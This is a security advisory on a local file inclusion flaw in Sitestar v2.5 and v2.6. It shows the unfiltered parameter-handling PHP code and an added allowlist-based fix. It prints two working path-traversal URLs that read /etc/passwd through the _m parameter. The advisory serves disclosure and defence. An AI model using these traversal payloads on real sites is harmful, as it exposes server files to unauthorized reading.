Sitestar v2.5 file inclusion vulnerability: exploit and fix - Vulnerability Warning - Black Bar Safety Net

2013-05-13T00:00:00
ID MYHACK58:62201338739
Type myhack58
Reporter Anonymous
Modified 2013-05-13T00:00:00

Description

I inadvertently found a file inclusion vulnerability of marginal value in Sitestar. While scanning a friend's website with WVS, the scanner reported the following file include vulnerabilities:

index.php?_a=fullist&_m=../../../../../../../../../../etc/passwd%00.jpg

admin/index.php?_a=admin_list&_m=../../../../../../../../../../etc/passwd%00.jpg

Testing shows that the affected versions are Sitestar v2.5 and Sitestar v2.6.

Looking at the index.php file, the code is as follows:

<?php
define('IN_CONTEXT', 1);
include_once('load.php');
?>

Following the flow into load.php, the statements that involve the _m variable are as follows:

$act =& ParamHolder::get('_m');
switch ($act) {
    case 'mod_order':
        include_once(P_INC.'/china_ds_data.php');
        break;
    case 'mod_auth':
    case 'mod_message':
        include_once(P_LIB.'/rand_math.php');
        break;
}

Next, look at how ParamHolder::get is implemented. The vulnerable file is library\param.php, and the code is as follows:

class ParamHolder {
    /**
     * Retrieve parameter
     *
     * @access public
     * @static
     * @param string $key_path The context path for retrieving data
     * @param mixed $value The default data as fallback
     * @param int $scope The parameter context
     * @return mixed
     */
    public static function &get($key_path, $default = false, $scope = PS_ALL) {
        switch ($scope) {
            case PS_GET:
                $rs =& ParamParser::retrive($_GET, $key_path, $default); // input variable $_GET may be a security threat
                break;
            case PS_POST:
                $rs =& ParamParser::retrive($_POST, $key_path, $default); // input variable $_POST may be a security threat
                break;
            case PS_COOKIE:
                $rs =& ParamParser::retrive($_COOKIE, $key_path, $default); // input variable $_COOKIE may be a security threat
                break;
            case PS_FILES:
                $rs =& ParamParser::retrive($_FILES, $key_path, $default); // input variable $_FILES may be a security threat
                /**
                 * get upload file type
                 */
                if (isset($rs["tmp_name"]) && !is_array($rs["tmp_name"]) && !empty($rs["tmp_name"])) {
                    $ftype = ParamParser::file_type($rs["tmp_name"]);
                    if ($ftype == 'unknown') die(__('Upload file type error,please retry!'));
                }
                break;
            case PS_MANUAL:
                $rs =& ManualParamHolder::get($key_path, $default);
                break;
            case PS_ALL:
                if (ParamParser::has($_GET, $key_path)) { // input variable $_GET may be a security threat
                    $rs =& ParamParser::retrive($_GET, $key_path, $default); // input variable $_GET may be a security threat
                } else if (ParamParser::has($_POST, $key_path)) { // input variable $_POST may be a security threat
                    $rs =& ParamParser::retrive($_POST, $key_path, $default); // input variable $_POST may be a security threat
                } else if (ParamParser::has($_COOKIE, $key_path)) { // input variable $_COOKIE may be a security threat
                    $rs =& ParamParser::retrive($_COOKIE, $key_path, $default); // input variable $_COOKIE may be a security threat
                } else if (ParamParser::has($_FILES, $key_path)) { // input variable $_FILES may be a security threat
                    $rs =& ParamParser::retrive($_FILES, $key_path, $default); // input variable $_FILES may be a security threat
                } else if (ManualParamHolder::has($key_path)) {
                    $rs =& ManualParamHolder::get($key_path, $default);
                } else {
                    $rs = $default;
                }
                break;
            default:
                $rs = $default;
        }
        return $rs;
    }
}

As you can see, the input variables are not filtered or validated in any way, which leads to the local file inclusion vulnerability.
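The missing check, sketched as an added example (not Sitestar's code and not the fix from the original article): the _m value is validated against a strict token pattern and an allowlist before it may reach an include path, then the resolved file is confirmed to sit inside the module directory. The function names resolve_module and module_path, the allowlist and the temporary directory are hypothetical, and the example assumes _m ends up in an include path, as the scanner findings indicate.

```php
<?php
// Added example, not Sitestar code; function names are hypothetical.

// Return a module name that is safe to place in an include path, or null.
function resolve_module($raw, array $allowed)
{
    // Arrays (?_m[]=x) and other non-strings are rejected outright.
    if (!is_string($raw)) {
        return null;
    }
    // Strict token: slashes, dots and NUL bytes can never match.
    // \A and \z anchor the whole string (a bare $ would allow a trailing newline).
    if (!preg_match('/\A[a-z][a-z0-9_]{0,31}\z/', $raw)) {
        return null;
    }
    // Allowlist comparison is type-strict.
    return in_array($raw, $allowed, true) ? $raw : null;
}

// Defence in depth: the resolved file must exist inside $baseDir.
function module_path($baseDir, $module)
{
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $module . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    return strpos($path, $base . DIRECTORY_SEPARATOR) === 0 ? $path : null;
}

// Constructed allowlist from the module names visible in load.php.
$allowed = array('mod_order', 'mod_auth', 'mod_message');

// Constructed module directory holding one file, so the demo runs anywhere.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lfi_demo_modules';
if (!is_dir($dir)) {
    mkdir($dir);
}
touch($dir . DIRECTORY_SEPARATOR . 'mod_auth.php');

// Constructed inputs: the scanner payload after URL decoding, an array, a valid name.
$samples = array("../../../../../../../../../../etc/passwd\0.jpg", array('mod_auth'), 'mod_auth');
foreach ($samples as $s) {
    $m = resolve_module($s, $allowed);
    $p = ($m === null) ? null : module_path($dir, $m);
    echo ($p === null ? 'rejected' : 'would include ' . basename($p)), PHP_EOL;
}
```

Validating at the point where the value is used, rather than inside the generic ParamHolder::get accessor, keeps the check tied to the one parameter that selects a file.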
